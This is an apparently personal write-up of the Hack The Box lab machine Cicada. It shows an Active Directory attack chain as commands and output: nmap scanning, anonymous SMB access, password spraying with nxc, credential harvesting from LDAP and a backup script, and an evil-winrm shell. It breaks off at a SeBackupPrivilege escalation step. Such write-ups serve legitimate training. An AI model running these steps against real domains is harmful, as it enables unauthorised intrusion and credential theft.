HTB Cicada done
Cicada
OS:
Windows Active Directory
Technology:
IP Address:
10.129.147.111
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 21:08:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
60291/tcp open msrpc Microsoft Windows RPC
Users and pass:
From file: Notice from HR.txt
default password
Cicada$M6Corpb*@Lp#nZp!8
---
After password spraying
L: michael.wrightson
P: Cicada$M6Corpb*@Lp#nZp!8
---
Find password from domain via LDAP
P: aRt$Lp#7t*VQ!3
---
After password spraying
L: david.orelious
P: aRt$Lp#7t*VQ!3
---
After read file: Backup_script.ps1
L: emily.oscars
P: Q!3@Lp#M6b*7t*Vt
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.147.111_nmap 10.129.147.111 ; cat 10.129.147.111_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:04 UTC
Nmap scan report for 10.129.147.111
Host is up (0.056s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 21:08:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
60291/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-20T21:09:54
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Add IP address to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ cat /etc/hosts | grep cicada
10.129.147.111 cicada.htb cicada-dc.cicada.htb
SMB: anonymous
List all shares
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient -L //10.129.147.111 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.147.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Download file from share: HR
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient //10.129.147.111/DEV -N
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ smbclient //10.129.147.111/HR -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 12:29:09 2024
.. D 0 Thu Mar 14 12:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 17:31:48 2024
4168447 blocks of size 4096. 428337 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (9.0 KiloBytes/sec) (average 9.0 KiloBytes/sec)
smb: \>
smb: \> exit
Read file: Notice from HR.txt
I found default password:
Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
List all users in AD
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u "aaa" -p "" --rid-brute
SMB 10.129.142.115 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.142.115 445 CICADA-DC [+] cicada.htb\aaa: (Guest)
SMB 10.129.142.115 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.142.115 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.142.115 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.142.115 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Password spraying
I use password from file "Notice from HR"
password: Cicada$M6Corpb*@Lp#nZp!8
I found interesing creds:
L: michael.wrightson
P: Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u list_user_ad.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success | grep +
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Cert:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Schema:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Enterprise:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Read-only:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Cloneable:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Protected:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Key:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Enterprise:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\RAS:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Allowed:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Denied:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\DnsAdmins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Groups:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.142.115 445 CICADA-DC [+] CICADA\Dev:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.142.115 445 CICADA-DC [+] cicada.htb\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB: user michael.wrightson - rabbithole
Check access to shares
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ smbclient //cicada.htb/SYSVOL -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 22 13:40:07 2024
.. D 0 Thu Mar 14 07:08:56 2024
cicada.htb Dr 0 Thu Mar 14 07:08:56 2024
4168447 blocks of size 4096. 435733 blocks available
Download files from share: SYSVOL
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \cicada.htb\DfsrPrivate\*
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\GPT.INI of size 59 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/GPT.INI (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\comment.cmtx of size 554 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/comment.cmtx (4.6 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\Registry.pol of size 160 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/Registry.pol (1.3 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (21.4 KiloBytes/sec) (average 4.9 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 554 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (4.5 KiloBytes/sec) (average 4.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 160 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (1.3 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1874 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (15.1 KiloBytes/sec) (average 5.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 5342 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (43.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ ls
10.129.147.111_nmap.gnmap 10.129.147.111_nmap.nmap 10.129.147.111_nmap.xml cicada.htb kerbrute list_user_ad.txt list_users_temp.txt 'Notice from HR.txt'
LDAP
List all records from AD (LDAP)
I found next password from AD
P: aRt$Lp#7t*VQ!3
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc ldap cicada.htb -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8'
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 10.129.212.172 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.129.212.172 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ ldapsearch -H ldap://cicada.htb -D '[email protected]' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b 'dc=cicada,dc=htb' | grep -B3 "password is"
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
Password spraying
Find next creds:
L: david.orelious
P: aRt$Lp#7t*VQ!3
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u list_user_ad.txt -p 'aRt$Lp#7t*VQ!3' --continue-on-success | grep +
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Domain:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Cert:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Schema:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Enterprise:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Group:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Read-only:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Cloneable:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Protected:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Key:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Enterprise:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\RAS:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Allowed:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Denied:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\DnsAdmins:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\DnsUpdateProxy:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Groups:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.212.172 445 CICADA-DC [+] CICADA\Dev:aRt$Lp#7t*VQ!3 (Guest)
SMB 10.129.212.172 445 CICADA-DC [+] cicada.htb\:aRt$Lp#7t*VQ!3 (Guest)
SMB: user david.orelious
Download file from share DEV: Backup_script.ps1
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u "david.orelious" -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.212.172 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.212.172 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.212.172 445 CICADA-DC [*] Enumerated shares
SMB 10.129.212.172 445 CICADA-DC Share Permissions Remark
SMB 10.129.212.172 445 CICADA-DC ----- ----------- ------
SMB 10.129.212.172 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.212.172 445 CICADA-DC C$ Default share
SMB 10.129.212.172 445 CICADA-DC DEV READ
SMB 10.129.212.172 445 CICADA-DC HR READ
SMB 10.129.212.172 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.212.172 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.212.172 445 CICADA-DC SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 438732 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (4.6 KiloBytes/sec) (average 4.6 KiloBytes/sec)
smb: \> exit
Read script: Backup_script.ps1
We see next creds:
L: emily.oscars
P: Q!3@Lp#M6b*7t*Vt
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Login as user: emily.oscars
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ evil-winrm -i 10.129.212.172 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ evil-winrm -i 10.129.212.172 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 9:49 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
bd247f235abda77091bbd8ca71890b83
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::7e1:af7c:d586:5ae6
Link-local IPv6 Address . . . . . : fe80::cfc2:a7ed:b287:1fd0%6
IPv4 Address. . . . . . . . . . . : 10.129.212.172
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%6
10.129.0.1
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
Privilege Escalation
Find SeBackupPrivilege privilege
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Download file: SAM and SYSTEM
